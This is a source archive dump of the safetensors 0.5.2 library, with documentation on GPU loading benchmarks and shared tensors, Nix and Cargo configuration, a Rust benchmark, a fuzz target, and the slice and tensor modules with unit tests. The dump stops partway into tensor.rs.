pytorch](https://gist.github.com/Narsil/3edeec2669a5e94e4707aa0f901d2282). The currently shown speedup was gotten on: * OS: Ubuntu 18.04.6 LTS * CPU: Intel(R) Xeon(R) CPU @ 2.00GHz ### GPU benchmark ```py >>> # This is required because this feature hasn't been fully verified yet, but >>> # it's been tested on many different environments >>> os.environ["SAFETENSORS_FAST_GPU"] = "1" >>> # CUDA startup out of the measurement >>> torch.zeros((2, 2)).cuda() >>> start_st = datetime.datetime.now() >>> weights = load_file(sf_filename, device="cuda:0") >>> load_time_st = datetime.datetime.now() - start_st >>> print(f"Loaded safetensors {load_time_st}") >>> start_pt = datetime.datetime.now() >>> weights = torch.load(pt_filename, map_location="cuda:0") >>> load_time_pt = datetime.datetime.now() - start_pt >>> print(f"Loaded pytorch {load_time_pt}") >>> print(f"on GPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X") Loaded safetensors 0:00:00.165206 Loaded pytorch 0:00:00.353889 on GPU, safetensors is faster than pytorch by: 2.1 X ``` The speedup works because this library is able to skip unnecessary CPU allocations. It is unfortunately not replicable in pure pytorch as far as we know. The library works by memory mapping the file, creating the tensor empty with pytorch and calling `cudaMemcpy` directly to move the tensor directly on the GPU. The currently shown speedup was gotten on: * OS: Ubuntu 18.04.6 LTS. * GPU: Tesla T4 * Driver Version: 460.32.03 * CUDA Version: 11.2 safetensors-0.5.2/docs/source/torch_shared_tensors.mdx000066400000000000000000000100661473753372300232570ustar00rootroot00000000000000# Torch shared tensors ## TL;DR Using specific functions, which should work in most cases for you. This is not without side effects. ```python from safetensors.torch import load_model, save_model save_model(model, "model.safetensors") # Instead of save_file(model.state_dict(), "model.safetensors") load_model(model, "model.safetensors") # Instead of model.load_state_dict(load_file("model.safetensors")) ``` ## What are shared tensors ? Pytorch uses shared tensors for some computation. This is extremely interesting to reduce memory usage in general. 
One very classic use case is in transformers: the `embeddings` are shared with `lm_head`.
By using the same matrix, the model uses fewer parameters, and gradients flow much better to the `embeddings`
(which sit at the start of the model, where gradients normally don't flow easily, whereas `lm_head` is at the
tail of the model, where gradients are plentiful; since they are the same tensor, both benefit).

```python
import torch
from torch import nn

class Model(nn.Module):
    def __init__(self):
        super().__init__()
        self.a = nn.Linear(100, 100)
        self.b = self.a

    def forward(self, x):
        return self.b(self.a(x))


model = Model()
print(model.state_dict())
# odict_keys(['a.weight', 'a.bias', 'b.weight', 'b.bias'])
torch.save(model.state_dict(), "model.bin")
# This file is now 41k instead of ~80k, because A and B are the same weight, hence only 1 is saved on disk, with both `a` and `b` pointing to the same buffer
```

## Why are shared tensors not saved in `safetensors` ?

Multiple reasons for that:

- *Not all frameworks support them*, for instance `tensorflow` does not. So if someone saves shared tensors in torch, there is no way to load them in a similar fashion, so we could not keep the same `Dict[str, Tensor]` API.

- *It would make lazy loading very hard.* Lazy loading is the ability to load only some tensors, or parts of tensors, from a given file. This is trivial to do without tensor sharing, but with tensor sharing:

```python
from safetensors import safe_open

with safe_open("model.safetensors", framework="pt") as f:
    a = f.get_tensor("a")
    b = f.get_tensor("b")
```

it becomes impossible with this code to "reshare" buffers after the fact. Once we hand out the `a` tensor, we have no way to give back the same memory when you ask for `b`. (In this particular example we could keep track of given buffers, but this is not the case in general, since you could do arbitrary work with `a`, like sending it to another device, before asking for `b`.)

- *It can lead to much larger files than necessary*. If you save a shared tensor which is only a fraction of a larger tensor, then saving it with pytorch leads to saving the entire buffer instead of saving just what is needed.

```python
import torch

a = torch.zeros((100, 100))
b = a[:1, :]
torch.save({"b": b}, "model.bin")
# File is 41k instead of the expected 400 bytes
# In practice it could happen that you save several 10GB instead of 1GB.
```

Now, with all those reasons being mentioned, nothing is set in stone. Shared tensors do not cause unsafety or denial-of-service potential, so this decision could be revisited if the current workarounds are not satisfactory.

## How does it work ?

The design is rather simple. We look for all shared tensors, then we look for all tensors covering the entire buffer (there can be multiple such tensors). That gives us multiple names which could be saved; we simply choose the first one.

During `load_model`, we load a bit like `load_state_dict` does, except we look into the model itself to check for shared buffers, and we ignore the "missing keys" which were actually covered by virtue of buffer sharing (they were properly loaded since there was a buffer that loaded under the hood). Every other error is raised as-is.

**Caveat**: This means some keys present in the model are dropped from the file. So if you inspect the keys saved on disk, or use `load_state_dict` directly, you will see some "missing tensors". Unless we start supporting shared tensors directly in the format, there is no real way around it.
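To make the first step of this design concrete, here is a minimal, illustrative sketch of how shared tensors can be grouped by their underlying storage before saving. It is not the library's internal implementation: the helper name `find_shared_groups` is hypothetical, and using `Tensor.untyped_storage().data_ptr()` as the grouping key assumes a recent PyTorch version that exposes that accessor.

```python
import torch
from collections import defaultdict


def find_shared_groups(state_dict):
    """Group parameter names whose tensors share the same underlying storage.

    Illustrative sketch only: keys on (device, storage data pointer), which is
    one practical way of detecting sharing; safetensors' own logic may differ.
    """
    groups = defaultdict(list)
    for name, tensor in state_dict.items():
        key = (tensor.device, tensor.untyped_storage().data_ptr())
        groups[key].append(name)
    # Only groups with more than one name correspond to shared tensors.
    return [names for names in groups.values() if len(names) > 1]


class Model(torch.nn.Module):
    def __init__(self):
        super().__init__()
        self.a = torch.nn.Linear(100, 100)
        self.b = self.a

    def forward(self, x):
        return self.b(self.a(x))


print(find_shared_groups(Model().state_dict()))
# e.g. [['a.weight', 'b.weight'], ['a.bias', 'b.bias']]
```

For tensors grouped this way, `save_model` keeps a single name per group, which is exactly why the saved file can appear to be "missing" the other names.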
safetensors-0.5.2/flake.lock000066400000000000000000000010671473753372300160300ustar00rootroot00000000000000{ "nodes": { "nixpkgs": { "locked": { "lastModified": 1730531603, "narHash": "sha256-Dqg6si5CqIzm87sp57j5nTaeBbWhHFaVyG7V6L8k3lY=", "owner": "NixOS", "repo": "nixpkgs", "rev": "7ffd9ae656aec493492b44d0ddfb28e79a1ea25d", "type": "github" }, "original": { "owner": "NixOS", "ref": "nixos-unstable", "repo": "nixpkgs", "type": "github" } }, "root": { "inputs": { "nixpkgs": "nixpkgs" } } }, "root": "root", "version": 7 } safetensors-0.5.2/flake.nix000066400000000000000000000016171473753372300156770ustar00rootroot00000000000000{ inputs = { nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable"; }; outputs = { nixpkgs, ... }: let forAllSystems = nixpkgs.lib.genAttrs [ "aarch64-linux" "x86_64-linux" "aarch64-darwin" ]; in { devShells = forAllSystems ( system: let pkgs = nixpkgs.legacyPackages.${system}; in { default = pkgs.mkShell { buildInputs = with pkgs; [ rustup python3Packages.python python3Packages.venvShellHook ]; venvDir = "./.venv"; postVenvCreation = '' unset SOURCE_DATE_EPOCH ''; postShellHook = '' unset SOURCE_DATE_EPOCH ''; LD_LIBRARY_PATH = "$LD_LIBRARY_PATH:${pkgs.stdenv.cc.cc.lib}/lib"; }; } ); }; } safetensors-0.5.2/safetensors/000077500000000000000000000000001473753372300164245ustar00rootroot00000000000000safetensors-0.5.2/safetensors/Cargo.toml000066400000000000000000000024431473753372300203570ustar00rootroot00000000000000[package] name = "safetensors" version = "0.5.2" edition = "2021" homepage = "https://github.com/huggingface/safetensors" repository = "https://github.com/huggingface/safetensors" documentation = "https://docs.rs/safetensors/" license = "Apache-2.0" keywords = ["safetensors", "huggingface", "Tensors", "Pytorch", "Tensorflow"] readme = "./README.md" description = """ Provides functions to read and write safetensors which aim to be safer than their PyTorch counterpart. The format is 8 bytes which is an unsized int, being the size of a JSON header, the JSON header refers the `dtype` the `shape` and `data_offsets` which are the offsets for the values in the rest of the file. 
""" exclude = [ "rust-toolchain", "target/*", "Cargo.lock"] # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html [dependencies] hashbrown = { version = "0.15.2", features = ["serde"], optional = true } serde = { version = "1.0", default-features = false, features = ["derive"] } serde_json = { version = "1.0", default-features = false } [dev-dependencies] criterion = "0.5" memmap2 = "0.9" proptest = "1.4" [features] default = ["std"] std = ["serde/default", "serde_json/default"] alloc = ["serde/alloc", "serde_json/alloc", "hashbrown"] [[bench]] name = "benchmark" harness = false safetensors-0.5.2/safetensors/LICENSE000077700000000000000000000000001473753372300206442../LICENSEustar00rootroot00000000000000safetensors-0.5.2/safetensors/README.md000077700000000000000000000000001473753372300213702../README.mdustar00rootroot00000000000000safetensors-0.5.2/safetensors/benches/000077500000000000000000000000001473753372300200335ustar00rootroot00000000000000safetensors-0.5.2/safetensors/benches/benchmark.rs000066400000000000000000000032451473753372300223370ustar00rootroot00000000000000use criterion::{black_box, criterion_group, criterion_main, Criterion}; use safetensors::tensor::*; use std::collections::HashMap; // Returns a sample data of size 2_MB fn get_sample_data() -> (Vec, Vec, Dtype) { let shape = vec![1000, 500]; let dtype = Dtype::F32; let n: usize = shape.iter().product::() * dtype.size(); // 4 let data = vec![0; n]; (data, shape, dtype) } pub fn bench_serialize(c: &mut Criterion) { let (data, shape, dtype) = get_sample_data(); let n_layers = 5; let mut metadata: HashMap = HashMap::new(); // 2_MB x 5 = 10_MB for i in 0..n_layers { let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap(); metadata.insert(format!("weight{i}"), tensor); } c.bench_function("Serlialize 10_MB", |b| { b.iter(|| { let _serialized = serialize(black_box(&metadata), black_box(&None)); }) }); } pub fn bench_deserialize(c: &mut Criterion) { let (data, shape, dtype) = get_sample_data(); let n_layers = 5; let mut metadata: HashMap = HashMap::new(); // 2_MB x 5 = 10_MB for i in 0..n_layers { let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap(); metadata.insert(format!("weight{i}"), tensor); } let out = serialize(&metadata, &None).unwrap(); c.bench_function("Deserlialize 10_MB", |b| { b.iter(|| { let _deserialized = SafeTensors::deserialize(black_box(&out)).unwrap(); }) }); } criterion_group!(bench_ser, bench_serialize); criterion_group!(bench_de, bench_deserialize); criterion_main!(bench_ser, bench_de); safetensors-0.5.2/safetensors/fuzz/000077500000000000000000000000001473753372300174225ustar00rootroot00000000000000safetensors-0.5.2/safetensors/fuzz/.gitignore000066400000000000000000000000411473753372300214050ustar00rootroot00000000000000target corpus artifacts coverage safetensors-0.5.2/safetensors/fuzz/Cargo.toml000066400000000000000000000006251473753372300213550ustar00rootroot00000000000000[package] name = "safetensors-fuzz" version = "0.0.0" publish = false edition = "2021" [package.metadata] cargo-fuzz = true [dependencies] libfuzzer-sys = "0.4" [dependencies.safetensors] path = ".." 
# Prevent this from interfering with workspaces [workspace] members = ["."] [profile.release] debug = 1 [[bin]] name = "fuzz_target_1" path = "fuzz_targets/fuzz_target_1.rs" test = false doc = false safetensors-0.5.2/safetensors/fuzz/fuzz_targets/000077500000000000000000000000001473753372300221515ustar00rootroot00000000000000safetensors-0.5.2/safetensors/fuzz/fuzz_targets/fuzz_target_1.rs000066400000000000000000000002411473753372300253000ustar00rootroot00000000000000#![no_main] use libfuzzer_sys::fuzz_target; use safetensors::tensor::SafeTensors; fuzz_target!(|data: &[u8]| { let _ = SafeTensors::deserialize(data); }); safetensors-0.5.2/safetensors/src/000077500000000000000000000000001473753372300172135ustar00rootroot00000000000000safetensors-0.5.2/safetensors/src/lib.rs000066400000000000000000000025471473753372300203370ustar00rootroot00000000000000#![deny(missing_docs)] #![doc = include_str!("../README.md")] #![cfg_attr(not(feature = "std"), no_std)] pub mod slice; pub mod tensor; /// serialize_to_file only valid in std #[cfg(feature = "std")] pub use tensor::serialize_to_file; pub use tensor::{serialize, Dtype, SafeTensorError, SafeTensors, View}; #[cfg(feature = "alloc")] #[macro_use] extern crate alloc; #[cfg(all(feature = "std", feature = "alloc"))] compile_error!("must choose either the `std` or `alloc` feature, but not both."); #[cfg(all(not(feature = "std"), not(feature = "alloc")))] compile_error!("must choose either the `std` or `alloc` feature"); /// A facade around all the types we need from the `std`, `core`, and `alloc` /// crates. This avoids elaborate import wrangling having to happen in every /// module. mod lib { #[cfg(not(feature = "std"))] mod no_stds { pub use alloc::borrow::Cow; pub use alloc::string::{String, ToString}; pub use alloc::vec::Vec; pub use hashbrown::HashMap; } #[cfg(feature = "std")] mod stds { pub use std::borrow::Cow; pub use std::collections::HashMap; pub use std::string::{String, ToString}; pub use std::vec::Vec; } /// choose std or no_std to export by feature flag #[cfg(not(feature = "std"))] pub use no_stds::*; #[cfg(feature = "std")] pub use stds::*; } safetensors-0.5.2/safetensors/src/slice.rs000066400000000000000000000460341473753372300206670ustar00rootroot00000000000000//! Module handling lazy loading via iterating on slices on the original buffer. use crate::lib::{String, ToString, Vec}; use crate::tensor::TensorView; use core::ops::{ Bound, Range, RangeBounds, RangeFrom, RangeFull, RangeInclusive, RangeTo, RangeToInclusive, }; /// Error representing invalid slicing attempt #[derive(Debug)] pub enum InvalidSlice { /// When the client asked for more slices than the tensors has dimensions TooManySlices, /// When the client asked for a slice that exceeds the allowed bounds SliceOutOfRange { /// The rank of the dimension that has the out of bounds dim_index: usize, /// The problematic value asked: usize, /// The dimension size we shouldn't go over. 
dim_size: usize, }, } #[derive(Debug, Clone)] /// Generic structure used to index a slice of the tensor pub enum TensorIndexer { /// This is selecting an entire dimension Select(usize), /// This is a regular slice, purely indexing a chunk of the tensor Narrow(Bound, Bound), //IndexSelect(Tensor), } fn display_bound(bound: &Bound) -> String { match bound { Bound::Unbounded => "".to_string(), Bound::Excluded(n) => format!("{n}"), Bound::Included(n) => format!("{n}"), } } /// Intended for Python users mostly or at least for its conventions impl core::fmt::Display for TensorIndexer { fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { match self { TensorIndexer::Select(n) => { write!(f, "{n}") } TensorIndexer::Narrow(left, right) => { write!(f, "{}:{}", display_bound(left), display_bound(right)) } } } } impl From for TensorIndexer { fn from(index: usize) -> Self { TensorIndexer::Select(index) } } // impl From<&[usize]> for TensorIndexer { // fn from(index: &[usize]) -> Self { // let tensor = index.into(); // TensorIndexer::IndexSelect(tensor) // } // } // // impl From> for TensorIndexer { // fn from(index: Vec) -> Self { // let tensor = Tensor::of_slice(&index); // TensorIndexer::IndexSelect(tensor) // } // } macro_rules! impl_from_range { ($range_type:ty) => { impl From<$range_type> for TensorIndexer { fn from(range: $range_type) -> Self { use core::ops::Bound::*; let start = match range.start_bound() { Included(idx) => Included(*idx), Excluded(idx) => Excluded(*idx), Unbounded => Unbounded, }; let end = match range.end_bound() { Included(idx) => Included(*idx), Excluded(idx) => Excluded(*idx), Unbounded => Unbounded, }; TensorIndexer::Narrow(start, end) } } }; } impl_from_range!(Range); impl_from_range!(RangeFrom); impl_from_range!(RangeFull); impl_from_range!(RangeInclusive); impl_from_range!(RangeTo); impl_from_range!(RangeToInclusive); /// Trait used to implement multiple signatures for ease of use of the slicing /// of a tensor pub trait IndexOp<'data, T> { /// Returns a slicing iterator which are the chunks of data necessary to /// reconstruct the desired tensor. 
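    /// Example: slicing a `TensorView` with ranges yields the raw byte chunks
    /// of the selected sub-tensor.
    ///
    /// ```
    /// use safetensors::tensor::{Dtype, TensorView};
    /// use safetensors::slice::IndexOp;
    ///
    /// // A 1 x 2 x 3 tensor of f32 values [0., 1., 2., 3., 4., 5.] stored as little-endian bytes.
    /// let data: Vec<u8> = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0]
    ///     .into_iter()
    ///     .flat_map(|f| f.to_le_bytes())
    ///     .collect();
    /// let view = TensorView::new(Dtype::F32, vec![1, 2, 3], &data).unwrap();
    /// // Keep everything in the first two dimensions, only index 0 of the last one.
    /// let bytes: Vec<u8> = view
    ///     .slice((.., .., ..1))
    ///     .unwrap()
    ///     .flat_map(|chunk| chunk.to_vec())
    ///     .collect();
    /// // Two f32 elements remain (0.0 and 3.0), i.e. 8 bytes.
    /// assert_eq!(bytes.len(), 8);
    /// ```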
fn slice(&'data self, index: T) -> Result, InvalidSlice>; } impl<'data, A> IndexOp<'data, A> for TensorView<'data> where A: Into, { fn slice(&'data self, index: A) -> Result, InvalidSlice> { self.sliced_data(&[index.into()]) } } impl<'data, A> IndexOp<'data, (A,)> for TensorView<'data> where A: Into, { fn slice(&'data self, index: (A,)) -> Result, InvalidSlice> { let idx_a = index.0.into(); self.sliced_data(&[idx_a]) } } impl<'data, A, B> IndexOp<'data, (A, B)> for TensorView<'data> where A: Into, B: Into, { fn slice(&'data self, index: (A, B)) -> Result, InvalidSlice> { let idx_a = index.0.into(); let idx_b = index.1.into(); self.sliced_data(&[idx_a, idx_b]) } } impl<'data, A, B, C> IndexOp<'data, (A, B, C)> for TensorView<'data> where A: Into, B: Into, C: Into, { fn slice(&'data self, index: (A, B, C)) -> Result, InvalidSlice> { let idx_a = index.0.into(); let idx_b = index.1.into(); let idx_c = index.2.into(); self.sliced_data(&[idx_a, idx_b, idx_c]) } } // impl IndexOp<(A, B, C, D)> for TensorView<'data> // where // A: Into, // B: Into, // C: Into, // D: Into, // { // fn slice(&self, index: (A, B, C, D)) -> TensorView<'data> { // let idx_a = index.0.into(); // let idx_b = index.1.into(); // let idx_c = index.2.into(); // let idx_d = index.3.into(); // self.sliced_data(&[idx_a, idx_b, idx_c, idx_d]) // } // } // // impl IndexOp<(A, B, C, D, E)> for TensorView<'data> // where // A: Into, // B: Into, // C: Into, // D: Into, // E: Into, // { // fn slice(&self, index: (A, B, C, D, E)) -> TensorView<'data> { // let idx_a = index.0.into(); // let idx_b = index.1.into(); // let idx_c = index.2.into(); // let idx_d = index.3.into(); // let idx_e = index.4.into(); // self.sliced_data(&[idx_a, idx_b, idx_c, idx_d, idx_e]) // } // } // // impl IndexOp<(A, B, C, D, E, F)> for TensorView<'data> // where // A: Into, // B: Into, // C: Into, // D: Into, // E: Into, // F: Into, // { // fn slice(&self, index: (A, B, C, D, E, F)) -> TensorView<'data> { // let idx_a = index.0.into(); // let idx_b = index.1.into(); // let idx_c = index.2.into(); // let idx_d = index.3.into(); // let idx_e = index.4.into(); // let idx_f = index.5.into(); // self.sliced_data(&[idx_a, idx_b, idx_c, idx_d, idx_e, idx_f]) // } // } // // impl IndexOp<(A, B, C, D, E, F, G)> for TensorView<'data> // where // A: Into, // B: Into, // C: Into, // D: Into, // E: Into, // F: Into, // G: Into, // { // fn slice(&self, index: (A, B, C, D, E, F, G)) -> TensorView<'data> { // let idx_a = index.0.into(); // let idx_b = index.1.into(); // let idx_c = index.2.into(); // let idx_d = index.3.into(); // let idx_e = index.4.into(); // let idx_f = index.5.into(); // let idx_g = index.6.into(); // self.sliced_data(&[idx_a, idx_b, idx_c, idx_d, idx_e, idx_f, idx_g]) // } // } /// Iterator used to return the bits of the overall tensor buffer /// when client asks for a slice of the original tensor. pub struct SliceIterator<'data> { view: &'data TensorView<'data>, indices: Vec<(usize, usize)>, newshape: Vec, } impl<'data> SliceIterator<'data> { pub(crate) fn new( view: &'data TensorView<'data>, slices: &[TensorIndexer], ) -> Result { // Make sure n. axis does not exceed n. of dimensions let n_slice = slices.len(); let n_shape = view.shape().len(); if n_slice > n_shape { return Err(InvalidSlice::TooManySlices); } let mut newshape = Vec::with_capacity(view.shape().len()); // Minimum span is the span of 1 item; let mut span = view.dtype().size(); let mut indices = vec![]; // Everything is row major. 
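        // Walk the dimensions from the innermost (last) to the outermost (first).
        // `span` is the number of bytes covered by one index step of the current
        // dimension. A dimension that is not sliced, or that is sliced over its
        // full range while nothing has been recorded yet, only grows `span`;
        // otherwise the selected range is recorded in `indices`, either directly
        // or as a cross product with the byte ranges of the inner dimensions.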
for (i, &shape) in view.shape().iter().enumerate().rev() { if i >= slices.len() { // We are not slicing yet, just increase the local span newshape.push(shape); } else { let slice = &slices[i]; let (start, stop) = match slice { TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded) => (0, shape), TensorIndexer::Narrow(Bound::Unbounded, Bound::Excluded(stop)) => (0, *stop), TensorIndexer::Narrow(Bound::Unbounded, Bound::Included(stop)) => { (0, *stop + 1) } TensorIndexer::Narrow(Bound::Included(s), Bound::Unbounded) => (*s, shape), TensorIndexer::Narrow(Bound::Included(s), Bound::Excluded(stop)) => (*s, *stop), TensorIndexer::Narrow(Bound::Included(s), Bound::Included(stop)) => { (*s, *stop + 1) } TensorIndexer::Narrow(Bound::Excluded(s), Bound::Unbounded) => (*s + 1, shape), TensorIndexer::Narrow(Bound::Excluded(s), Bound::Excluded(stop)) => { (*s + 1, *stop) } TensorIndexer::Narrow(Bound::Excluded(s), Bound::Included(stop)) => { (*s + 1, *stop + 1) } TensorIndexer::Select(s) => (*s, *s + 1), }; if start >= shape && stop > shape { return Err(InvalidSlice::SliceOutOfRange { dim_index: i, asked: stop.saturating_sub(1), dim_size: shape, }); } if let TensorIndexer::Narrow(..) = slice { newshape.push(stop - start); } if indices.is_empty() { if start == 0 && stop == shape { // We haven't started to slice yet, just increase the span } else { let offset = start * span; let small_span = stop * span - offset; indices.push((offset, offset + small_span)); } } else { let capacity = (stop - start) * indices.len(); let mut newindices = Vec::with_capacity(capacity); for n in start..stop { let offset = n * span; for (old_start, old_stop) in &indices { newindices.push((old_start + offset, old_stop + offset)); } } indices = newindices; } } span *= shape; } if indices.is_empty() { indices.push((0, view.data().len())); } // Reversing so we can pop faster while iterating on the slice let indices = indices.into_iter().rev().collect(); let newshape = newshape.into_iter().rev().collect(); Ok(Self { view, indices, newshape, }) } /// Gives back the amount of bytes still being in the iterator pub fn remaining_byte_len(&self) -> usize { self.indices .iter() .map(|(start, stop)| (stop - start)) .sum() } /// Gives back the amount of bytes still being in the iterator pub fn newshape(&self) -> Vec { self.newshape.clone() } } impl<'data> Iterator for SliceIterator<'data> { type Item = &'data [u8]; fn next(&mut self) -> Option { // TODO We might want to move the logic from `new` // here actually to remove the need to get all the indices // upfront. 
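        // `indices` was reversed at the end of `new`, so popping from the back
        // yields the byte ranges in ascending offset order.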
let (start, stop) = self.indices.pop()?; Some(&self.view.data()[start..stop]) } } #[cfg(test)] mod tests { use super::*; use crate::tensor::{Dtype, TensorView}; #[test] fn test_helpers() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView::new(Dtype::F32, vec![1, 2, 3], &data).unwrap(); let iterator = SliceIterator::new( &attn_0, &[TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded)], ) .unwrap(); assert_eq!(iterator.remaining_byte_len(), 24); assert_eq!(iterator.newshape(), vec![1, 2, 3]); let iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Included(0), Bound::Excluded(1)), ], ) .unwrap(); assert_eq!(iterator.remaining_byte_len(), 12); assert_eq!(iterator.newshape(), vec![1, 1, 3]); } #[test] fn test_dummy() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView::new(Dtype::F32, vec![1, 2, 3], &data).unwrap(); let mut iterator = SliceIterator::new( &attn_0, &[TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded)], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..24])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..24])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..24])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..24])); assert_eq!(iterator.next(), None); assert!(SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), ], ) .is_err(),); } #[test] fn test_slice_variety() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView::new(Dtype::F32, vec![1, 2, 3], &data).unwrap(); let mut iterator = SliceIterator::new( &attn_0, &[TensorIndexer::Narrow( Bound::Included(0), Bound::Excluded(1), )], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..24])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Included(0), Bound::Excluded(1)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..12])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Included(0), Bound::Excluded(1)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[0..4])); assert_eq!(iterator.next(), Some(&data[12..16])); assert_eq!(iterator.next(), None); let mut iterator = 
SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Included(1), Bound::Excluded(2)), TensorIndexer::Narrow(Bound::Included(0), Bound::Excluded(1)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[12..16])); assert_eq!(iterator.next(), None); } #[test] fn test_slice_variety2() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView::new(Dtype::F32, vec![2, 3], &data).unwrap(); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Unbounded, Bound::Unbounded), TensorIndexer::Narrow(Bound::Included(1), Bound::Excluded(3)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[4..12])); assert_eq!(iterator.next(), Some(&data[16..24])); assert_eq!(iterator.next(), None); } #[test] fn test_slice_select() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView::new(Dtype::F32, vec![2, 3], &data).unwrap(); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Select(1), TensorIndexer::Narrow(Bound::Included(1), Bound::Excluded(3)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[16..24])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Select(0), TensorIndexer::Narrow(Bound::Included(1), Bound::Excluded(3)), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[4..12])); assert_eq!(iterator.next(), None); let mut iterator = SliceIterator::new( &attn_0, &[ TensorIndexer::Narrow(Bound::Included(1), Bound::Excluded(2)), TensorIndexer::Select(0), ], ) .unwrap(); assert_eq!(iterator.next(), Some(&data[12..16])); assert_eq!(iterator.next(), None); } } safetensors-0.5.2/safetensors/src/tensor.rs000066400000000000000000001263761473753372300211120ustar00rootroot00000000000000//! Module Containing the most important structures use crate::lib::{Cow, HashMap, String, ToString, Vec}; use crate::slice::{InvalidSlice, SliceIterator, TensorIndexer}; use serde::{ser::SerializeMap, Deserialize, Deserializer, Serialize, Serializer}; #[cfg(feature = "std")] use std::io::Write; const MAX_HEADER_SIZE: usize = 100_000_000; /// Possible errors that could occur while reading /// A Safetensor file. #[derive(Debug)] pub enum SafeTensorError { /// The header is an invalid UTF-8 string and cannot be read. InvalidHeader, /// The header's first byte is not the expected `{`. InvalidHeaderStart, /// The header does contain a valid string, but it is not valid JSON. InvalidHeaderDeserialization, /// The header is large than 100Mo which is considered too large (Might evolve in the future). HeaderTooLarge, /// The header is smaller than 8 bytes HeaderTooSmall, /// The header length is invalid InvalidHeaderLength, /// The tensor name was not found in the archive TensorNotFound(String), /// Invalid information between shape, dtype and the proposed offsets in the file TensorInvalidInfo, /// The offsets declared for tensor with name `String` in the header are invalid InvalidOffset(String), /// IoError #[cfg(feature = "std")] IoError(std::io::Error), /// JSON error JsonError(serde_json::Error), /// The follow tensor cannot be created because the buffer size doesn't match shape + dtype InvalidTensorView(Dtype, Vec, usize), /// The metadata is invalid because the data offsets of the tensor does not /// fully cover the buffer part of the file. The last offset **must** be /// the end of the file. 
MetadataIncompleteBuffer, /// The metadata contains information (shape or shape * dtype size) which lead to an /// arithmetic overflow. This is most likely an error in the file. ValidationOverflow, } #[cfg(feature = "std")] impl From for SafeTensorError { fn from(error: std::io::Error) -> SafeTensorError { SafeTensorError::IoError(error) } } impl From for SafeTensorError { fn from(error: serde_json::Error) -> SafeTensorError { SafeTensorError::JsonError(error) } } impl core::fmt::Display for SafeTensorError { fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result { write!(f, "{self:?}") } } impl core::error::Error for SafeTensorError {} struct PreparedData { n: u64, header_bytes: Vec, offset: usize, } /// The trait necessary to enable safetensors to serialize a tensor /// If you have an owned tensor like this: /// /// ```rust /// use safetensors::tensor::{View, Dtype}; /// use std::borrow::Cow; /// struct Tensor{ dtype: MyDtype, shape: Vec, data: Vec} /// /// # type MyDtype = Dtype; /// impl<'data> View for &'data Tensor{ /// fn dtype(&self) -> Dtype{ /// self.dtype.into() /// } /// fn shape(&self) -> &[usize]{ /// &self.shape /// } /// fn data(&self) -> 